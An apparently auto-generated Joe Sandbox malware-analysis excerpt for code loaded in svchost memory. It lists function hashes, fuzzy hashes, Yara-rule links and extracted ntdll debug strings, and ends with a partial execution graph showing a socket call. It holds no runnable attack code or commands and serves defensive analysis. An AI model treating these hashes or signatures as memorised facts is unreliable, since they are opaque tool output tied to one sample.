                                                • Instruction Fuzzy Hash: C7F09A74E10348EBDB04EBB9E445BAEB7B4EB08600F108059A901EB280DAB4D9019B24
                                                Function 03D052E2 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d7a2968ef1b5899ba30c21365a63d928fc8e7ccf21dce8e29e06548bb03c514
                                                • Instruction ID: ded371e07e1748941e691deec43cc4bca7c56cff267a7c622fcafeac880bfe34
                                                • Opcode Fuzzy Hash: 9d7a2968ef1b5899ba30c21365a63d928fc8e7ccf21dce8e29e06548bb03c514
                                                • Instruction Fuzzy Hash: FCF0BE74A10388ABDB04EFB9E905E6EB7B4FF14700F044059A801EB2C0EA74D900DB54
                                                Function 03D05283 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12f0ab0c003108f49b16120f664dd0bb9119ea8cb249ca7f88dd299e054ccd7a
                                                • Instruction ID: f83c39e30eaada003709eb97964c0163f681bc15705a4c308b76dcdf4cefb105
                                                • Opcode Fuzzy Hash: 12f0ab0c003108f49b16120f664dd0bb9119ea8cb249ca7f88dd299e054ccd7a
                                                • Instruction Fuzzy Hash: 75F0BE78A10348EFDB04EBB9E905FAEB7B4FF04700F004459A841EB3C1EA74DA009B54
                                                Function 03D05341 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7e84d68ba4e24a1beb774b95633ff2e910463e9f4746b1619f8e0559867b28d
                                                • Instruction ID: 800551065526d0bbd28660149b07a6e8a5caeb93abc95094fca58fce0a0908e7
                                                • Opcode Fuzzy Hash: d7e84d68ba4e24a1beb774b95633ff2e910463e9f4746b1619f8e0559867b28d
                                                • Instruction Fuzzy Hash: 16F02774E0434DEBCB04EBB9E845E9EB7B4EF09700F100059E801EB3D0EA74D9009714
                                                Function 03C67208 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1febe9a29e817114b347e1798c5b18e3e55451a9cb4a4455448346f185f5fd1
                                                • Instruction ID: b5deb4219d9a6fe05607c887b2fdc8303a372903088216600866b280c831869b
                                                • Opcode Fuzzy Hash: b1febe9a29e817114b347e1798c5b18e3e55451a9cb4a4455448346f185f5fd1
                                                • Instruction Fuzzy Hash: C0F020B1911A869FC722E72EC0C4F22B3E99F00B78F0D84A0D809CF701CBA8D980C290
                                                Function 03D05227 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef1b5205e17e6b4cba9483183e2f2624dd854ba19d7616f05c8b5c79df4cdd21
                                                • Instruction ID: 56dfea8232f35617044c5582f6a18dc9be27d963a23747c4f01d63d80567c699
                                                • Opcode Fuzzy Hash: ef1b5205e17e6b4cba9483183e2f2624dd854ba19d7616f05c8b5c79df4cdd21
                                                • Instruction Fuzzy Hash: 4BF08274A14348ABDB14EBB9E905F6EB7B8EF44704F050459A901EB2C1EA74DA009759
                                                Function 03D051CB Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09ad0b0c6c8f3688280cbf6112972ab17eb58a3732f44c69fd1aa3f4e44a012a
                                                • Instruction ID: 182c71e739b34bfeb4df7ec9519b3ddee5cb5b91be06e3327e5d5d33248f8de3
                                                • Opcode Fuzzy Hash: 09ad0b0c6c8f3688280cbf6112972ab17eb58a3732f44c69fd1aa3f4e44a012a
                                                • Instruction Fuzzy Hash: 3DF08274A14248EBDB04EBB9E905F6EB7B4FF04704F050059A941EB2C1EA74E900DB59
                                                Function 03CAD070 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                • Instruction ID: 1854dab4fd8da43b96068a412b3b0fa7e9e44bcbea6b8286ab9e1621e10e0914
                                                • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                • Instruction Fuzzy Hash: A1F0E53360471467C230AA0D8C09F5BFBACDBD5B70F10431ABA24DB1D0DA70A911D7D6
                                                Function 03CEF72E Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7bbf317355bd7ee605832070697460d22e264af68120c8a0ebecc8e987d73070
                                                • Instruction ID: 8ab750c49cdb7cd595c22baa4f9886dd8be943df51a8d57e4e8f42c7df597337
                                                • Opcode Fuzzy Hash: 7bbf317355bd7ee605832070697460d22e264af68120c8a0ebecc8e987d73070
                                                • Instruction Fuzzy Hash: A3F0A775A10348EBDB04EBB9D559E9E77B4EF08704F060059E541EF3C0D974D901A759
                                                Function 03C30710 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction ID: 87a12ad40f9cf34ee92673e01622df3132510b56eeeac4861ce5204a6ca8c130
                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction Fuzzy Hash: 79F06D3E3047949BDB16DF2AD050AA57BA8EB46364B0500D9E846CF351EB31EAC2CB94
                                                Function 03D037B6 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                • Instruction ID: 52cc8818afe91b07db853a3a64a24060d7a3d10607d524bb6d8fb5902960521f
                                                • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                • Instruction Fuzzy Hash: 21E06D76210200AFE764DB58CD05FA673ACEB40B60F150258B515D70D0DBB0AE40CA60
                                                Function 03CB4000 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                • Instruction ID: 9483c06bde7a0abe31757ea4d27738c16b90deff60aff492d2c210f91666726c
                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                • Instruction Fuzzy Hash: D0E0C2343043058FD719CF1AD080BA2B7B6BFD5A10F28C068A848CF206EB32E942CB40
                                                Function 03CEB3D0 Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                • Instruction ID: 7ecc973c1769ec0f2cbfe555df3d60c60431597a215ed0e215d2c2cbb7eaf25f
                                                • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                • Instruction Fuzzy Hash: E3E0CD35244314B7DB22AA40CC00F797B15DB407D0F118031FB08DE650C5719D51E6D4
                                                Function 03C2823B Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                • Instruction ID: 0735f13feaa6e0276769938e5476d0e95e4f29de0a4dc4c54aa966010bdaabd5
                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                • Instruction Fuzzy Hash: 59E08C35101B20EEDB31FF12DC04F527AA5FB84B50F164969E482CE4A48BB0AC91EA44
                                                Function 03CB92BC Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a85336327f86bc6edbed0671a86a272e95ff036d29e47ee339cb71028902596
                                                • Instruction ID: 125a70e25ffe6558b28bcf92848992d32ae806ef62701d1ec91a3b788231c1c5
                                                • Opcode Fuzzy Hash: 1a85336327f86bc6edbed0671a86a272e95ff036d29e47ee339cb71028902596
                                                • Instruction Fuzzy Hash: 2AF0E535651B84CFE72ADF08D1E2F91B3BAFB65B44F500458D446CFBA1C73AAA42CA40
                                                Function 03C32050 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 640ae5e4a702fa018663e70a754fd336ebfc89bbf86a6e50ee7eae7c1ef1d67d
                                                • Instruction ID: 05b961014d58bd53b5cca6d95c986c66ee80bc894913873fdc98b64cb312df63
                                                • Opcode Fuzzy Hash: 640ae5e4a702fa018663e70a754fd336ebfc89bbf86a6e50ee7eae7c1ef1d67d
                                                • Instruction Fuzzy Hash: 36E0C2332007906BC721FB5DDD00F8A73AEEFA53A0F024221F150CB690CA60EC00D794
                                                Function 03C2A0E3 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                • Instruction ID: e8f7dc10c910495732127aeee6bc3712225556ef60d2d53a196366e0f80a9bde
                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                • Instruction Fuzzy Hash: CCD0123A31617097CB29E6566914F67BD159BC5AA4F1A016D780AD7900CD158C42E6E0
                                                Function 03C402A0 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                • Instruction ID: 1c0462645c36cdf0474f9257489164cb9fbaf1c77018e06211ea7fa06bafb8d3
                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                • Instruction Fuzzy Hash: B8D0C935252E81CFD62ACF0DC5A4B16B3B8BB44B44F8604D0E501CBB61D66CEA40CE00
                                                Function 03CB930B Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                • Instruction ID: 515e16e59f7e986cebb3101ac59683fd6826bac4e1b83e2fe525bd65ade7665e
                                                • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                • Instruction Fuzzy Hash: E2D05E35945AC4CFE727CB08C165B907BF8F705B40F890098E0428BBA2C37C9A84CB10
                                                Function 03C6C700 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                • Instruction ID: 0739117aced7e209daf7f718c1b25cc6fe6254657a345a45e752a03bef9e5298
                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                • Instruction Fuzzy Hash: 90C0123A290688AFC712EA98CD01F027BA9EB98B80F014021F6048B670C631E820EA84
                                                Function 03C50310 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction ID: af6cc01c1105e08974ba28cad21c1b442f453ef79e4d5d8ced204fd8aa62431e
                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction Fuzzy Hash: 4AD01236100248EFCB01DF41C890D9A772AFBD8710F148019FD194B610CA31ED62DA50
                                                Function 03C30750 Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction ID: b78394523fbcc826d887ce2e392feda29ae03ba974a0804cc97a4bb7a47ae7e8
                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction Fuzzy Hash: 15C04879B11A818FCF15EB2AD294F4977E8FB84744F1A08D0E805CFB21E624EA11DA10
                                                Function 03C72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 68f4612d5e19820e097fea57aa846fb415acdf13e87fb68241b6f7b7fc2dd38e
                                                • Instruction ID: efe65e552ba8c6ba2f1a327fbf350d34c612125bbbb71844f3318db3e6f654ce
                                                • Opcode Fuzzy Hash: 68f4612d5e19820e097fea57aa846fb415acdf13e87fb68241b6f7b7fc2dd38e
                                                • Instruction Fuzzy Hash: 3951EBB6A04556BFCB10DF9DC99097EF7B8BB08204B188569E8A5DB641D334DF44CBE0
                                                Function 03C67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03CA4742
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03CA46FC
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03CA4655
                                                • Execute=1, xrefs: 03CA4713
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03CA4787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03CA4725
                                                • ExecuteOptions, xrefs: 03CA46A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 1c6f53650ccb40283799fe10f8040436b39d97cfbb627499b81fb7a745151332
                                                • Instruction ID: 06b9f57d481f30b6d1324014d8eb9986d75efd06abc0d947a6222a4263b94bae
                                                • Opcode Fuzzy Hash: 1c6f53650ccb40283799fe10f8040436b39d97cfbb627499b81fb7a745151332
                                                • Instruction Fuzzy Hash: E8511735A003196ADB25EBA9DCC5FAE73B8AF04308F0804A9D505EF281E770EA419B50
                                                Function 03C7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 34d7a80f866803ea96099025eacc2307bae200f9dd0d7ef8311687fdf6967e29
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 7D81AF74E452499EDF28CE69C8917FEBBB5AF45350F1C425AEC61EB390C7349E408B60
                                                Function 03C5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03CA02E7
                                                • RTL: Re-Waiting, xrefs: 03CA031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03CA02BD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 80f615509c55bee5a8fbc5557b6c354e971492a0ddee51d2ba228251dccf47b1
                                                • Instruction ID: b48dd6e33cae6828f470beb5e4377074818ba2f757c513872737d7287a0a4653
                                                • Opcode Fuzzy Hash: 80f615509c55bee5a8fbc5557b6c354e971492a0ddee51d2ba228251dccf47b1
                                                • Instruction Fuzzy Hash: 5BE1B031604B42DFD728CF28C884B6AB7E0BB85358F180A5DF9A5CB2D1D775E984CB46
                                                Function 03C6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03CA7B7F
                                                • RTL: Resource at %p, xrefs: 03CA7B8E
                                                • RTL: Re-Waiting, xrefs: 03CA7BAC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 91ee4a63170b419d9167b136cf6e3bc633a358f36bed3f03636805aa3cb5f59d
                                                • Instruction ID: ec8330e975c7650e24055be146c3fcb55e893f51878979c81df99d1cc1424b3e
                                                • Opcode Fuzzy Hash: 91ee4a63170b419d9167b136cf6e3bc633a358f36bed3f03636805aa3cb5f59d
                                                • Instruction Fuzzy Hash: 2341E5397047029FC724DE6ADC80B6AB7E9FF84710F140A2DE956DF690DB30E9058B92
                                                Function 03C6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03CA728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 03CA72A3
                                                • RTL: Re-Waiting, xrefs: 03CA72C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03CA7294
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 841dd5f8802488c8e6727995ca81adc7fb992f5a7badcdbd3b8e057a8c326018
                                                • Instruction ID: d9f05128909cebfc15da59a1f08ae3aaf03a5f25a2ffc3fd96c899188efcd288
                                                • Opcode Fuzzy Hash: 841dd5f8802488c8e6727995ca81adc7fb992f5a7badcdbd3b8e057a8c326018
                                                • Instruction Fuzzy Hash: 3641EE35600B06ABC720DE6ACC81B6AB7A5FB84718F144629F895EB240DB21F9529BD1
                                                Function 03C77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: 496ba0ddffc164ef3be77e7d9607d1638b2546ec5716a4f03d6fcad8134fbe6e
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: D491A170E0021E9FDF24DE69CD85ABEB7A5EF44360F18851AEC65EB2C0D7309A418B60
                                                Function 03C39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: b8b59842621210d6a43b77628b99d3814a5ea1cd71b293743381447bf040af07
                                                • Instruction ID: 6f1e881fbeb022f4a0fa1fbfcd48d6c0d75139eebf8b1b87225491d8be405923
                                                • Opcode Fuzzy Hash: b8b59842621210d6a43b77628b99d3814a5ea1cd71b293743381447bf040af07
                                                • Instruction Fuzzy Hash: 51812B76D002699BDB31DF54CC48BEEB7B8AB08710F0545DAA919FB280D7709E84DFA0

                                                Execution Graph

                                                Execution Coverage:1.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph 2484 637a29e 2486 637a2a5 socket 2484->2486 2487 637a355 2486->2487

                                                Executed Functions

                                                Function 0637A29E Relevance: 1.7, APIs: 1, Instructions: 196networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
